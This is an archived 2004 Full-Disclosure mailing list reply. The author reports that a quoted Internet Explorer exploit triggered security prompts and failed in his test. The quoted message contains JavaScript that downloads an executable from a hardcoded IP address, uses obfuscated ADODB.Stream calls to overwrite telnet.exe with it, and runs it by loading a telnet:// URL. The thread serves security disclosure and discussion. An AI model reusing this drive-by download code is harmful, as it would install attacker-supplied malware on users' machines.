[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] telnet URL type used in exploit

To: michael.hale@xxxxxxxxx (Michael Hale)
Subject: Re: [Full-Disclosure] telnet URL type used in exploit
From: Darren Reed <avalon@xxxxxxxxxxxxxxxx>
Date: Wed, 21 Jul 2004 12:25:33 +1000 (Australia/NSW)

Michael,

Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:

"This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?" [Yes] [No]

And that was loading it into IE as a *local file*...when I put it on
a web page, I got the usual half dozen alerts about "do you want to run
javascript", etc. that even if I said yes to it didn't work.  

Did you get that popup box when you tested your script below ?

Darren

> In reply the discussion found at: 
> 
> http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html
> 
> the consesus seems to be that there are no obvious ways to exploit the
> mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
> these may not be exploitable per se, they certainly are when used in
> conjction with other known exploits. Take the following code for
> example:
> 
> var downloadurl="http://213.159.117.133/dl/loadadv74.exe";;
> 
> if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
> savetopath="C:\\WINDOWS\\system32\\telnet.exe";
> 
> if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
> savetopath="C:\\WINNT\\system32\\telnet.exe";
> 
> payloadURL = downloadurl;
> 
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET",payloadURL,0);
> x.Send();
> 
> function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
> + "r" + "e" + "a" + "m"; }
> var s = new ActiveXObject(bla());
> 
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
> s.SaveToFile(savetopath,2);
> 
> location.href = "telnet://";;
> 
> The JavaScript overwrites telnet.exe with a downloaded executable and
> then runs it by pointing the browser at telnet://. Instead of
> launching a telnet shell as expected, the attackers code is executed.
> This is not only an example of the telnet URL type being involved in
> an exploit, but one that actually relies on it.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] telnet URL type used in exploit
  - From: Michael Hale

References:
- [Full-Disclosure] telnet URL type used in exploit
  - From: Michael Hale

Prev by Date: [Full-Disclosure] RE: mi2g - fud, lies and libel
Next by Date: Re: [Full-Disclosure] IE
Previous by thread: Re: [Full-Disclosure] telnet URL type used in exploit
Next by thread: Re: [Full-Disclosure] telnet URL type used in exploit
Index(es):
- Date
- Thread